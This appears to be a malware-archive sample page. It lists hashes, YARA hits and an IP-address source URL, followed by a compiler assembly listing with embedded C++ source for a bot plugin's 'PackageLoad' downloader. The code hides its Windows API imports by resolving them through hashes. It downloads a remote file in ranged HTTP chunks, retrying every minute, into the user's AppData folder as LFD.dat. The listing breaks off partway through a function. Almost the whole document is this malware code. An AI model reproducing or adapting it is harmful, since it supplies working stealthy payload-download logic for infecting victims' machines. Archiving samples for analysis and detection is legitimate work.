Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: e48d0f16d5e09db567c92f586dbc1e14 --

Hashes
MD5: e48d0f16d5e09db567c92f586dbc1e14
SHA1: eef4cc38648820c6bf483e17dc09509f9df80e67
SHA256: 188e5a617953c512791d9b69db3187627190493555260946b77c5e1c4cdf0ff2
SSDEEP: 384:CC+3yYf/EoZ6TCWl9jCBoORiwVpKszkafC9bUfmUZ/QBBKyO/Wwcb6N:7mozwVpKCkMqbU+SUMyOuwcb6N
Details
File Type: BSD
Yara Hits
CuckooSandbox/embedded_win_api | YRP/domain | YRP/contentis_base64 |
Source
http://103.68.190.250/Sources//Advance/BJWJ/Builds/BOT_PLUG/Objs/Release/PackageLoad.cod
Strings
		; Listing generated by Microsoft (R) Optimizing Compiler Version 15.00.30729.01 
	TITLE	e:\Projects\progs\Petrosjan\BJWJ\Source\Misc\PackageLoad.cpp
	.686P
	include listing.inc
	.model	flat
INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES
PUBLIC	??$pushargEx@$06$0NOKKJFFH@$0BMF@HHHW4SHGFP_TYPE@@PA_W@@YAPAXHHHW4SHGFP_TYPE@@PA_W@Z ; pushargEx<7,3735721303,453,int,int,int,enum SHGFP_TYPE,wchar_t *>
EXTRN	?GetProcAddressEx2@@YAPAXPADKKH@Z:PROC		; GetProcAddressEx2
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\core\getapi.h
;	COMDAT ??$pushargEx@$06$0NOKKJFFH@$0BMF@HHHW4SHGFP_TYPE@@PA_W@@YAPAXHHHW4SHGFP_TYPE@@PA_W@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
??$pushargEx@$06$0NOKKJFFH@$0BMF@HHHW4SHGFP_TYPE@@PA_W@@YAPAXHHHW4SHGFP_TYPE@@PA_W@Z PROC ; pushargEx<7,3735721303,453,int,int,int,enum SHGFP_TYPE,wchar_t *>, COMDAT
; 131  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 132  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E);
; 133  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00003	68 c5 01 00 00	 push	 453			; 000001c5H
  00008	68 57 95 aa de	 push	 -559245993		; deaa9557H
  0000d	6a 07		 push	 7
  0000f	6a 00		 push	 0
  00011	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00016	83 c4 10	 add	 esp, 16			; 00000010H
; 134  : 	return func(a1, a2, a3, a4, a5);
  00019	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  0001c	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  0001f	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  00022	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00025	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  00028	ff d0		 call	 eax
; 135  : }
  0002a	5d		 pop	 ebp
  0002b	c3		 ret	 0
??$pushargEx@$06$0NOKKJFFH@$0BMF@HHHW4SHGFP_TYPE@@PA_W@@YAPAXHHHW4SHGFP_TYPE@@PA_W@Z ENDP ; pushargEx<7,3735721303,453,int,int,int,enum SHGFP_TYPE,wchar_t *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z ; pushargEx<1,748795376,127,wchar_t *,wchar_t *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z PROC ; pushargEx<1,748795376,127,wchar_t *,wchar_t *>, COMDAT
; 108  : 	typedef LPVOID (WINAPI *newfunc)(A, B);
; 109  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	6a 7f		 push	 127			; 0000007fH
  00002	68 f0 b5 a1 2c	 push	 748795376		; 2ca1b5f0H
  00007	6a 01		 push	 1
  00009	6a 00		 push	 0
  0000b	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00010	83 c4 10	 add	 esp, 16			; 00000010H
; 110  : 	return func(a1,a2);
  00013	ff 74 24 08	 push	 DWORD PTR _a2$[esp-4]
  00017	ff 74 24 08	 push	 DWORD PTR _a1$[esp]
  0001b	ff d0		 call	 eax
; 111  : }
  0001d	c3		 ret	 0
??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z ENDP ; pushargEx<1,748795376,127,wchar_t *,wchar_t *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0IPIPBAC@$0BF@PA_WJHHHHH@@YAPAXPA_WJHHHHH@Z ; pushargEx<1,150532354,21,wchar_t *,long,int,int,int,int,int>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0IPIPBAC@$0BF@PA_WJHHHHH@@YAPAXPA_WJHHHHH@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
_a6$ = 28						; size = 4
_a7$ = 32						; size = 4
??$pushargEx@$00$0IPIPBAC@$0BF@PA_WJHHHHH@@YAPAXPA_WJHHHHH@Z PROC ; pushargEx<1,150532354,21,wchar_t *,long,int,int,int,int,int>, COMDAT
; 147  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 148  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E, F, G);
; 149  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00003	6a 15		 push	 21			; 00000015H
  00005	68 02 f1 f8 08	 push	 150532354		; 08f8f102H
  0000a	6a 01		 push	 1
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 150  : 	return func(a1, a2, a3, a4, a5, a6, a7);
  00016	ff 75 20	 push	 DWORD PTR _a7$[ebp]
  00019	ff 75 1c	 push	 DWORD PTR _a6$[ebp]
  0001c	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  0001f	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  00022	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  00025	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00028	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  0002b	ff d0		 call	 eax
; 151  : }
  0002d	5d		 pop	 ebp
  0002e	c3		 ret	 0
??$pushargEx@$00$0IPIPBAC@$0BF@PA_WJHHHHH@@YAPAXPA_WJHHHHH@Z ENDP ; pushargEx<1,150532354,21,wchar_t *,long,int,int,int,int,int>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z ; pushargEx<1,2935475185,37,void *,unsigned long *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z PROC ; pushargEx<1,2935475185,37,void *,unsigned long *>, COMDAT
; 108  : 	typedef LPVOID (WINAPI *newfunc)(A, B);
; 109  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	6a 25		 push	 37			; 00000025H
  00002	68 f1 cb f7 ae	 push	 -1359492111		; aef7cbf1H
  00007	6a 01		 push	 1
  00009	6a 00		 push	 0
  0000b	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00010	83 c4 10	 add	 esp, 16			; 00000010H
; 110  : 	return func(a1,a2);
  00013	ff 74 24 08	 push	 DWORD PTR _a2$[esp-4]
  00017	ff 74 24 08	 push	 DWORD PTR _a1$[esp]
  0001b	ff d0		 call	 eax
; 111  : }
  0001d	c3		 ret	 0
??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z ENDP ; pushargEx<1,2935475185,37,void *,unsigned long *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0DNJJHCPF@$0CP@H@@YAPAXH@Z	; pushargEx<1,1033466613,47,int>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0DNJJHCPF@$0CP@H@@YAPAXH@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
??$pushargEx@$00$0DNJJHCPF@$0CP@H@@YAPAXH@Z PROC	; pushargEx<1,1033466613,47,int>, COMDAT
; 100  : 	typedef LPVOID (WINAPI *newfunc)(A);
; 101  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	6a 2f		 push	 47			; 0000002fH
  00002	68 f5 72 99 3d	 push	 1033466613		; 3d9972f5H
  00007	6a 01		 push	 1
  00009	6a 00		 push	 0
  0000b	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00010	83 c4 10	 add	 esp, 16			; 00000010H
; 102  : 	return func(a1);
  00013	ff 74 24 04	 push	 DWORD PTR _a1$[esp-4]
  00017	ff d0		 call	 eax
; 103  : }
  00019	c3		 ret	 0
??$pushargEx@$00$0DNJJHCPF@$0CP@H@@YAPAXH@Z ENDP	; pushargEx<1,1033466613,47,int>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z PROC ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>, COMDAT
; 131  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 132  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E);
; 133  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00003	6a 16		 push	 22			; 00000016H
  00005	68 c3 d1 3f 0f	 push	 255840707		; 0f3fd1c3H
  0000a	6a 01		 push	 1
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 134  : 	return func(a1, a2, a3, a4, a5);
  00016	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  00019	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  0001c	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  0001f	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00022	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  00025	ff d0		 call	 eax
; 135  : }
  00027	5d		 pop	 ebp
  00028	c3		 ret	 0
??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z ENDP ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z	; pushargEx<1,1916711125,17,void *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z PROC	; pushargEx<1,1916711125,17,void *>, COMDAT
; 100  : 	typedef LPVOID (WINAPI *newfunc)(A);
; 101  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	6a 11		 push	 17			; 00000011H
  00002	68 d5 b0 3e 72	 push	 1916711125		; 723eb0d5H
  00007	6a 01		 push	 1
  00009	6a 00		 push	 0
  0000b	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00010	83 c4 10	 add	 esp, 16			; 00000010H
; 102  : 	return func(a1);
  00013	ff 74 24 04	 push	 DWORD PTR _a1$[esp-4]
  00017	ff d0		 call	 eax
; 103  : }
  00019	c3		 ret	 0
??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z ENDP	; pushargEx<1,1916711125,17,void *>
_TEXT	ENDS
PUBLIC	?Download@@YAXPADPA_W@Z				; Download
EXTRN	?Clear@HTTPResponse@@YAXPAUTHTTPResponseRec@@@Z:PROC ; HTTPResponse::Clear
EXTRN	?HTTPFreeRequest@@YAXPAUTHTTPRequestRec@@@Z:PROC ; HTTPFreeRequest
EXTRN	?Free@STR@@YAXPAD@Z:PROC			; STR::Free
EXTRN	?ExecuteMethod@HTTP@@YA_NPAUTHTTPRequestRec@@PAUTResponseData@1@@Z:PROC ; HTTP::ExecuteMethod
EXTRN	?HTTPCreateRequest@@YAPAUTHTTPRequestRec@@PAD@Z:PROC ; HTTPCreateRequest
EXTRN	?m_memset@@YAXPBXEI@Z:PROC			; m_memset
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\misc\packageload.cpp
;	COMDAT ?Download@@YAXPADPA_W@Z
_TEXT	SEGMENT
_SysPath1$ = -628					; size = 520
_Resp$82948 = -108					; size = 64
_nFileLen$ = -44					; size = 8
_dwSizeHigh$82929 = -36					; size = 4
_Size$82949 = -32					; size = 4
_ButeWriten$82959 = -28					; size = 4
_LoadedFileName$82878 = -24				; size = 18
_hFile$ = -4						; size = 4
_URL$ = 8						; size = 4
_Result$82947 = 12					; size = 4
_FileName$ = 12						; size = 4
?Download@@YAXPADPA_W@Z PROC				; Download, COMDAT
; 7    : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
  00003	81 ec 74 02 00
	00		 sub	 esp, 628		; 00000274H
  00009	53		 push	 ebx
; 8    : 	 
; 9    : 	WCHAR SysPath1[MAX_PATH];
; 10   : 	m_memset(SysPath1,0,MAX_PATH);
  0000a	68 04 01 00 00	 push	 260			; 00000104H
  0000f	33 db		 xor	 ebx, ebx
  00011	8d 85 8c fd ff
	ff		 lea	 eax, DWORD PTR _SysPath1$[ebp]
  00017	53		 push	 ebx
  00018	50		 push	 eax
  00019	e8 00 00 00 00	 call	 ?m_memset@@YAXPBXEI@Z	; m_memset
  0001e	83 c4 0c	 add	 esp, 12			; 0000000cH
; 11   : 	if (FileName==NULL)
  00021	39 5d 0c	 cmp	 DWORD PTR _FileName$[ebp], ebx
  00024	75 64		 jne	 SHORT $LN8@Download
; 12   : 	{
; 13   : 		WCHAR LoadedFileName[] = {'\\','L','F','D','.','d','a','t',L'\0'};
  00026	6a 5c		 push	 92			; 0000005cH
  00028	58		 pop	 eax
  00029	6a 4c		 push	 76			; 0000004cH
  0002b	66 89 45 e8	 mov	 WORD PTR _LoadedFileName$82878[ebp], ax
  0002f	58		 pop	 eax
  00030	6a 46		 push	 70			; 00000046H
  00032	66 89 45 ea	 mov	 WORD PTR _LoadedFileName$82878[ebp+2], ax
  00036	58		 pop	 eax
  00037	6a 44		 push	 68			; 00000044H
  00039	66 89 45 ec	 mov	 WORD PTR _LoadedFileName$82878[ebp+4], ax
  0003d	58		 pop	 eax
  0003e	6a 2e		 push	 46			; 0000002eH
  00040	66 89 45 ee	 mov	 WORD PTR _LoadedFileName$82878[ebp+6], ax
  00044	58		 pop	 eax
  00045	6a 64		 push	 100			; 00000064H
  00047	66 89 45 f0	 mov	 WORD PTR _LoadedFileName$82878[ebp+8], ax
  0004b	58		 pop	 eax
  0004c	6a 61		 push	 97			; 00000061H
  0004e	66 89 45 f2	 mov	 WORD PTR _LoadedFileName$82878[ebp+10], ax
  00052	58		 pop	 eax
  00053	6a 74		 push	 116			; 00000074H
  00055	66 89 45 f4	 mov	 WORD PTR _LoadedFileName$82878[ebp+12], ax
  00059	58		 pop	 eax
  0005a	66 89 45 f6	 mov	 WORD PTR _LoadedFileName$82878[ebp+14], ax
  0005e	33 c0		 xor	 eax, eax
  00060	66 89 45 f8	 mov	 WORD PTR _LoadedFileName$82878[ebp+16], ax
; 14   : 		pSHGetFolderPathW(NULL, CSIDL_APPDATA, NULL, SHGFP_TYPE_CURRENT, SysPath1);
  00064	8d 85 8c fd ff
	ff		 lea	 eax, DWORD PTR _SysPath1$[ebp]
  0006a	50		 push	 eax
  0006b	53		 push	 ebx
  0006c	53		 push	 ebx
  0006d	6a 1a		 push	 26			; 0000001aH
  0006f	53		 push	 ebx
  00070	e8 00 00 00 00	 call	 ??$pushargEx@$06$0NOKKJFFH@$0BMF@HHHW4SHGFP_TYPE@@PA_W@@YAPAXHHHW4SHGFP_TYPE@@PA_W@Z ; pushargEx<7,3735721303,453,int,int,int,enum SHGFP_TYPE,wchar_t *>
; 15   : 		plstrcatW( SysPath1, LoadedFileName );
  00075	8d 45 e8	 lea	 eax, DWORD PTR _LoadedFileName$82878[ebp]
  00078	50		 push	 eax
  00079	8d 85 8c fd ff
	ff		 lea	 eax, DWORD PTR _SysPath1$[ebp]
  0007f	50		 push	 eax
  00080	e8 00 00 00 00	 call	 ??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z ; pushargEx<1,748795376,127,wchar_t *,wchar_t *>
  00085	83 c4 1c	 add	 esp, 28			; 0000001cH
; 16   : 	}
; 17   : 	else
  00088	eb 11		 jmp	 SHORT $LN7@Download
$LN8@Download:
; 18   : 	{
; 19   : 		plstrcatW( SysPath1, FileName );
  0008a	ff 75 0c	 push	 DWORD PTR _FileName$[ebp]
  0008d	8d 85 8c fd ff
	ff		 lea	 eax, DWORD PTR _SysPath1$[ebp]
  00093	50		 push	 eax
  00094	e8 00 00 00 00	 call	 ??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z ; pushargEx<1,748795376,127,wchar_t *,wchar_t *>
  00099	59		 pop	 ecx
  0009a	59		 pop	 ecx
$LN7@Download:
; 20   : 	}
; 21   : 	HANDLE hFile = (HANDLE)pCreateFileW( SysPath1, GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0 );
  0009b	6a 15		 push	 21			; 00000015H
  0009d	68 02 f1 f8 08	 push	 150532354		; 08f8f102H
  000a2	6a 01		 push	 1
  000a4	53		 push	 ebx
  000a5	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  000aa	83 c4 10	 add	 esp, 16			; 00000010H
  000ad	53		 push	 ebx
  000ae	68 80 00 00 00	 push	 128			; 00000080H
  000b3	6a 04		 push	 4
  000b5	53		 push	 ebx
  000b6	6a 02		 push	 2
  000b8	68 00 00 00 40	 push	 1073741824		; 40000000H
  000bd	8d 8d 8c fd ff
	ff		 lea	 ecx, DWORD PTR _SysPath1$[ebp]
  000c3	51		 push	 ecx
  000c4	ff d0		 call	 eax
  000c6	89 45 fc	 mov	 DWORD PTR _hFile$[ebp], eax
; 22   : 	LONGLONG nFileLen = 0;
; 23   : 	if (hFile!=INVALID_HANDLE_VALUE)
  000c9	83 f8 ff	 cmp	 eax, -1
  000cc	0f 84 bc 00 00
	00		 je	 $LN6@Download
  000d2	56		 push	 esi
  000d3	57		 push	 edi
; 24   : 	{
; 25   : 		DWORD dwSizeHigh=0, dwSizeLow=0;
; 26   : 		dwSizeLow = (DWORD)pGetFileSize(hFile, &dwSizeHigh);
  000d4	8d 4d dc	 lea	 ecx, DWORD PTR _dwSizeHigh$82929[ebp]
  000d7	51		 push	 ecx
  000d8	50		 push	 eax
  000d9	89 5d dc	 mov	 DWORD PTR _dwSizeHigh$82929[ebp], ebx
  000dc	e8 00 00 00 00	 call	 ??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z ; pushargEx<1,2935475185,37,void *,unsigned long *>
  000e1	59		 pop	 ecx
; 27   : 
; 28   : 		// nFileLen = ((LONGLONG)dwSizeHigh * (LONGLONG)(4294967295+1)) + (LONGLONG)dwSizeLow;// 
; 29   : 		nFileLen = dwSizeLow;
  000e2	8b f0		 mov	 esi, eax
  000e4	89 5d d8	 mov	 DWORD PTR _nFileLen$[ebp+4], ebx
$LN18@Download:
; 24   : 	{
; 25   : 		DWORD dwSizeHigh=0, dwSizeLow=0;
; 26   : 		dwSizeLow = (DWORD)pGetFileSize(hFile, &dwSizeHigh);
  000e7	59		 pop	 ecx
$LL5@Download:
; 30   : 
; 31   : 		while (true)
; 32   : 		{
; 33   : 			PHTTPRequestRec R = HTTPCreateRequest(URL);
  000e8	ff 75 08	 push	 DWORD PTR _URL$[ebp]
  000eb	e8 00 00 00 00	 call	 ?HTTPCreateRequest@@YAPAUTHTTPRequestRec@@PAD@Z ; HTTPCreateRequest
  000f0	8b f8		 mov	 edi, eax
; 34   : 
; 35   : 			R->UseRange = true;
; 36   : 			R->StartRange = (DWORD)nFileLen;
; 37   : 			R->EndRange = (DWORD)(nFileLen+STEP);
  000f2	8d 86 00 90 01
	00		 lea	 eax, DWORD PTR [esi+102400]
; 38   : 
; 39   : 			PCHAR Result;
; 40   : 
; 41   : 
; 42   : 			HTTP::TResponseData Resp;
; 43   : 			ClearStruct(Resp);
  000f8	6a 40		 push	 64			; 00000040H
  000fa	89 47 44	 mov	 DWORD PTR [edi+68], eax
  000fd	8d 45 94	 lea	 eax, DWORD PTR _Resp$82948[ebp]
  00100	53		 push	 ebx
  00101	50		 push	 eax
  00102	c6 47 3c 01	 mov	 BYTE PTR [edi+60], 1
  00106	89 77 40	 mov	 DWORD PTR [edi+64], esi
  00109	e8 00 00 00 00	 call	 ?m_memset@@YAXPBXEI@Z	; m_memset
; 44   : 			Resp.Buffer = &Result;
  0010e	8d 45 0c	 lea	 eax, DWORD PTR _Result$82947[ebp]
  00111	89 45 94	 mov	 DWORD PTR _Resp$82948[ebp], eax
; 45   : 	
; 46   : 			DWORD Size;
; 47   : 			Resp.Size =&Size;
  00114	8d 45 e0	 lea	 eax, DWORD PTR _Size$82949[ebp]
  00117	89 45 98	 mov	 DWORD PTR _Resp$82948[ebp+4], eax
; 48   : 	
; 49   : 		
; 50   : 			if(false==HTTP::ExecuteMethod(R, &Resp))
  0011a	8d 45 94	 lea	 eax, DWORD PTR _Resp$82948[ebp]
  0011d	50		 push	 eax
  0011e	57		 push	 edi
  0011f	e8 00 00 00 00	 call	 ?ExecuteMethod@HTTP@@YA_NPAUTHTTPRequestRec@@PAUTResponseData@1@@Z ; HTTP::ExecuteMethod
  00124	83 c4 18	 add	 esp, 24			; 00000018H
  00127	84 c0		 test	 al, al
  00129	75 0c		 jne	 SHORT $LN3@Download
; 51   : 			{			
; 52   : 				pSleep(1000*60);
  0012b	68 60 ea 00 00	 push	 60000			; 0000ea60H
  00130	e8 00 00 00 00	 call	 ??$pushargEx@$00$0DNJJHCPF@$0CP@H@@YAPAXH@Z ; pushargEx<1,1033466613,47,int>
; 53   : 				continue;
  00135	eb b0		 jmp	 SHORT $LN18@Download
$LN3@Download:
; 54   : 			}
; 55   : 			if (0==Resp.Response.FullSize)//
  00137	39 5d c8	 cmp	 DWORD PTR _Resp$82948[ebp+52], ebx
  0013a	74 47		 je	 SHORT $LN15@Download
; 56   : 			{				
; 57   : 				break;
; 58   : 			}
; 59   : 			DWORD ButeWriten;
; 60   : 			pWriteFile(hFile, Result, Size, &ButeWriten, NULL );
  0013c	53		 push	 ebx
  0013d	8d 45 e4	 lea	 eax, DWORD PTR _ButeWriten$82959[ebp]
  00140	50		 push	 eax
  00141	ff 75 e0	 push	 DWORD PTR _Size$82949[ebp]
  00144	ff 75 0c	 push	 DWORD PTR _Result$82947[ebp]
  00147	ff 75 fc	 push	 DWORD PTR _hFile$[ebp]
  0014a	e8 00 00 00 00	 call	 ??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>
; 61   : 
; 62   : 			nFileLen+=ButeWriten;
; 63   : 			if (nFileLen==Resp.Response.FullSize)
  0014f	8b 45 c8	 mov	 eax, DWORD PTR _Resp$82948[ebp+52]
  00152	83 c4 14	 add	 esp, 20			; 00000014H
  00155	03 75 e4	 add	 esi, DWORD PTR _ButeWriten$82959[ebp]
  00158	11 5d d8	 adc	 DWORD PTR _nFileLen$[ebp+4], ebx
  0015b	3b f0		 cmp	 esi, eax
  0015d	75 05		 jne	 SHORT $LN17@Download
  0015f	39 5d d8	 cmp	 DWORD PTR _nFileLen$[ebp+4], ebx
  00162	74 1f		 je	 SHORT $LN15@Download
$LN17@Download:
; 64   : 			{
; 65   : 				//
; 66   : 				break;
; 67   : 			}
; 68   : 			STR::Free(Result);
  00164	ff 75 0c	 push	 DWORD PTR _Result$82947[ebp]
  00167	e8 00 00 00 00	 call	 ?Free@STR@@YAXPAD@Z	; STR::Free
; 69   : 			HTTPFreeRequest(R);
  0016c	57		 push	 edi
  0016d	e8 00 00 00 00	 call	 ?HTTPFreeRequest@@YAXPAUTHTTPRequestRec@@@Z ; HTTPFreeRequest
; 70   : 			HTTPResponse::Clear(&Resp.Response);
  00172	8d 45 a0	 lea	 eax, DWORD PTR _Resp$82948[ebp+12]
  00175	50		 push	 eax
  00176	e8 00 00 00 00	 call	 ?Clear@HTTPResponse@@YAXPAUTHTTPResponseRec@@@Z ; HTTPResponse::Clear
  0017b	83 c4 0c	 add	 esp, 12			; 0000000cH
; 71   : 	
; 72   : 		
; 73   : 		}
  0017e	e9 65 ff ff ff	 jmp	 $LL5@Download
$LN15@Download:
; 74   : 		pCloseHandle(hFile);
  00183	ff 75 fc	 push	 DWORD PTR _hFile$[ebp]
  00186	e8 00 00 00 00	 call	 ??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z ; pushargEx<1,1916711125,17,void *>
  0018b	59		 pop	 ecx
  0018c	5f		 pop	 edi
  0018d	5e		 pop	 esi
$LN6@Download:
  0018e	5b		 pop	 ebx
; 75   : 	}	
; 76   : }
  0018f	c9		 leave
  00190	c3		 ret	 0
?Download@@YAXPADPA_W@Z ENDP				; Download
_TEXT	ENDS
PUBLIC	?PackageLoad@@YGKPAX@Z				; PackageLoad
; Function compile flags: /Ogspy
;	COMDAT ?PackageLoad@@YGKPAX@Z
_TEXT	SEGMENT
_SysPath1$82989 = -540					; size = 520
_LoadedFileName$82990 = -20				; size = 18
_lpData$ = 8						; size = 4
?PackageLoad@@YGKPAX@Z PROC				; PackageLoad, COMDAT
; 81   : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
  00003	81 ec 1c 02 00
	00		 sub	 esp, 540		; 0000021cH
  00009	56		 push	 esi
  0000a	33 f6		 xor	 esi, esi
$LL3@PackageLoa:
; 82   : 	while (true)
; 83   : 	{
; 84   : 		WCHAR SysPath1[MAX_PATH];
; 85   : 		WCHAR LoadedFileName[] = {'\\','L','F','D','.','d','a','t',L'\0'};
  0000c	6a 5c		 push	 92			; 0000005cH
  0000e	58		 pop	 eax
  0000f	6a 4c		 push	 76			; 0000004cH
  00011	66 89 45 ec	 mov	 WORD PTR _LoadedFileName$82990[ebp], ax
  00015	58		 pop	 eax
  00016	6a 46		 push	 70			; 00000046H
  00018	66 89 45 ee	 mov	 WORD PTR _LoadedFileName$82990[ebp+2], ax
  0001c	58		 pop	 eax
  0001d	6a 44		 push	 68			; 00000044H
  0001f	66 89 45 f0	 mov	 WORD PTR _LoadedFileName$82990[ebp+4], ax
  00023	58		 pop	 eax
  00024	6a 2e		 push	 46			; 0000002eH
  00026	66 89 45 f2	 mov	 WORD PTR _LoadedFileName$82990[ebp+6], ax
  0002a	58		 pop	 eax
  0002b	6a 64		 push	 100			; 00000064H
  0002d	66 89 45 f4	 mov	 WORD PTR _LoadedFileName$82990[ebp+8], ax
  00031	58		 pop	 eax
  00032	6a 61		 push	 97			; 00000061H
  00034	66 89 45 f6	 mov	 WORD PTR _LoadedFileName$82990[ebp+10], ax
  00038	58		 pop	 eax
  00039	6a 74		 push	 116			; 00000074H
  0003b	66 89 45 f8	 mov	 WORD PTR _LoadedFileName$82990[ebp+12], ax
  0003f	58		 pop	 eax
  00040	66 89 45 fa	 mov	 WORD PTR _LoadedFileName$82990[ebp+14], ax
  00044	33 c0		 xor	 eax, eax
  00046	66 89 45 fc	 mov	 WORD PTR _LoadedFileName$82990[ebp+16], ax
; 86   : 
; 87   : 		pSHGetFolderPathW(NULL, CSIDL_APPDATA, NULL, SHGFP_TYPE_CURRENT, SysPath1);
  0004a	8d 85 e4 fd ff
	ff		 lea	 eax, DWORD PTR _SysPath1$82989[ebp]
  00050	50		 push	 eax
  00051	56		 push	 esi
  00052	56		 push	 esi
  00053	6a 1a		 push	 26			; 0000001aH
